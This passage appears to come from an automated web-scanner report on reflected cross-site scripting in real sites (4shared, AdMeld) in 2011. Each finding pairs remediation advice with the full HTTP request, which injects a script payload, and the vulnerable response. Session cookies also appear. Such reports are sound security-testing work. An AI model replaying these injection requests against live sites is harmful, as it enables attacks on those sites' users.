This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins/jquery.openid.jse541a&quot;-alert(1)-&quot;0f1b43c7c9d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C143464BBA385C37A4E2F937E7C446F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:05 GMT
Content-Length: 36219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.448. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1f89"-alert(1)-"d8bdea6d6a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsc1f89&quot;-alert(1)-&quot;d8bdea6d6a7/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37539B6328ADF8C92CE74F121083CDC1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

3.449. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 871d8"-alert(1)-"3e7896575aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp871d8"-alert(1)-"3e7896575aa?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp871d8&quot;-alert(1)-&quot;3e7896575aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA208822AC4E87AC84DD6BBC3E34F4F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/signup-script.jsp871d8"-alert(1)-"3e7896575aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.450. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306f"-alert(1)-"185336a2aa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room7306f"-alert(1)-"185336a2aa2/press_room.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room7306f&quot;-alert(1)-&quot;185336a2aa2/press_room.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAB306016A90DE13652BCA754E6DB680.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:19 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room7306f"-alert(1)-"185336a2aa2/press_room.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.451. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e703"-alert(1)-"88745b017aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room/press_room.css9e703"-alert(1)-"88745b017aa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room/press_room.css9e703&quot;-alert(1)-&quot;88745b017aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA804B0B34E735B008C1BC3E9368AF61.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room/press_room.css9e703"-alert(1)-"88745b017aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.452. http://static.4shared.com/themes/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1a9"-alert(1)-"b65b614c6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes7f1a9"-alert(1)-"b65b614c6be/default.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes7f1a9&quot;-alert(1)-&quot;b65b614c6be/default.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=480EF7610CAC6BBB0D085FFC3EAB1570.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes7f1a9"-alert(1)-"b65b614c6be/default.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.453. http://static.4shared.com/themes/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a6b"-alert(1)-"5873520bbff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/default.cssd8a6b"-alert(1)-"5873520bbff?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes/default.cssd8a6b&quot;-alert(1)-&quot;5873520bbff
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3A7A8AF385D4FC1A8E0ED110F3EB0BE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:26 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes/default.cssd8a6b"-alert(1)-"5873520bbff";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.454. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5ec34<script>alert(1)</script>39e86d48143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd5ec34<script>alert(1)</script>39e86d48143&floor_price=0.70&container=ADMELD76212205993 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiMTYweDYwMCIsICBmcmVxOiAgICAgICAgICIwLTAiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjYzZGEzZDUyLWNmNDEtNDllNS05YjI1LWE0MDYwNmM1MTc1MCIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgIjM2NzYzMTY2NyIsICBkaXY6ICAgICAgICAgICI2M2RhM2Q1Mi1jZjQxLTQ5ZTUtOWIyNS1hNDA2MDZjNTE3NTAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3BvcG9udGhlcG9wLmNvbS8yMDExLzA0L2xpbmRzYXktbG9oYW4tbG9zZXMtdmljdG9yaWEtZ290dGktcm9sZS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiaG91c2UiLCAgaW1wOiAgICAgICAgICA0MywgIG5ldHdvcmtfaWQ6ICAgMCwgIGFjY291bnRfaWQ6ICAgMCwgIG5ldHdvcmtfbmFtZTogIkFkTWVsZCBQU0EiLCAgcHVibGlzaGVyX25hbWU6ICJnbGFtIiwgIGVjcG06ICAgICAgICAgIjAuNzAiLCAgZmVjcG06ICAgICAgICAiMC43MCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbXSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcyMSJ9
Content-Length: 367
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:58 GMT
Connection: close

GlamAdmeldRenderJsAd5ec34<script>alert(1)</script>39e86d48143({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":160,"height":600,"container":"ADMELD76212205993","bid":0.00,"requestId":"63da3d52-cf41-49e5-9b25-a40606c51750","views":0,"expires":
...[SNIP]...

3.455. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [container parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload 26828<script>alert(1)</script>9a4422dcdde was submitted in the container parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD7621220599326828<script>alert(1)</script>9a4422dcdde HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiMTYweDYwMCIsICBmcmVxOiAgICAgICAgICIwLTAiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgImVlOTY5MzRiLTYzZGQtNDgxOC05NzgwLWZmOGQ0MzZkZDhhZiIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgIjM2NzYzMTY2NyIsICBkaXY6ICAgICAgICAgICJlZTk2OTM0Yi02M2RkLTQ4MTgtOTc4MC1mZjhkNDM2ZGQ4YWYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3BvcG9udGhlcG9wLmNvbS8yMDExLzA0L2xpbmRzYXktbG9oYW4tbG9zZXMtdmljdG9yaWEtZ290dGktcm9sZS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiaG91c2UiLCAgaW1wOiAgICAgICAgICA3MCwgIG5ldHdvcmtfaWQ6ICAgMCwgIGFjY291bnRfaWQ6ICAgMCwgIG5ldHdvcmtfbmFtZTogIkFkTWVsZCBQU0EiLCAgcHVibGlzaGVyX25hbWU6ICJnbGFtIiwgIGVjcG06ICAgICAgICAgIjAuNzAiLCAgZmVjcG06ICAgICAgICAiMC43MCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbXSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxNyJ9
Content-Length: 367
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:29:00 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":160,"height":600,"container":"ADMELD7621220599326828<script>alert(1)</script>9a4422dcdde","bid":0.00,"requestId":"ee96934b-63dd-4818-9780-ff8d436dd8af","views":0,"expires":1303349400,"creative":"<img src=\"http://tag.admeld.com/psa/adc_es_green_160x600.jpg\"/>
...[SNIP]...

3.456. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abcb9<script>alert(1)</script>3d8eb2f0e91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAdabcb9<script>alert(1)</script>3d8eb2f0e91&floor_price=0.70&container=ADMELD6529836193 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjAtMCIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNmE0YTY3Y2YtNDY0ZC00MGI5LThlZGUtNjFhZmJiYTE2ZDdiIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMzY3NjMxNjY3IiwgIGRpdjogICAgICAgICAgIjZhNGE2N2NmLTQ2NGQtNDBiOS04ZWRlLTYxYWZiYmExNmQ3YiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vcG9wb250aGVwb3AuY29tLzIwMTEvMDQvbGluZHNheS1sb2hhbi1sb3Nlcy12aWN0b3JpYS1nb3R0aS1yb2xlLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJob3VzZSIsICBpbXA6ICAgICAgICAgIDQ5LCAgbmV0d29ya19pZDogICAwLCAgYWNjb3VudF9pZDogICAwLCAgbmV0d29ya19uYW1lOiAiQWRNZWxkIFBTQSIsICBwdWJsaXNoZXJfbmFtZTogImdsYW0iLCAgZWNwbTogICAgICAgICAiMC43MCIsICBmZWNwbTogICAgICAgICIwLjcwIiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICIzNjc2MzE2NjciLCAgcnVsZTogICAgICAgICAiMzY3NjMxNjY3IiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ikx1Y2lkTWVkaWEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1MTQzOSwgImJ1eSI6MjAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFwcE5leHVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6OTQ5MjQsICJidXkiOjExMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ0MzcsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMzM3NjQsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJJbnZpdGUgTWVkaWEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo5OTUxMiwgImJ1eSI6NTA3LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDAxNDQsICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQ2hhbmdvIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTc1NDYzLCAiYnV5IjoxMTcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlNpbXBsaS5maSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI1NDU2NSwgImJ1eSI6MTA4NCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJYQS5uZXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNjIxNTcsICJidXkiOjIwMzcsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQWN1aXR5IEFkcyAoUlRCKSIsICJiaW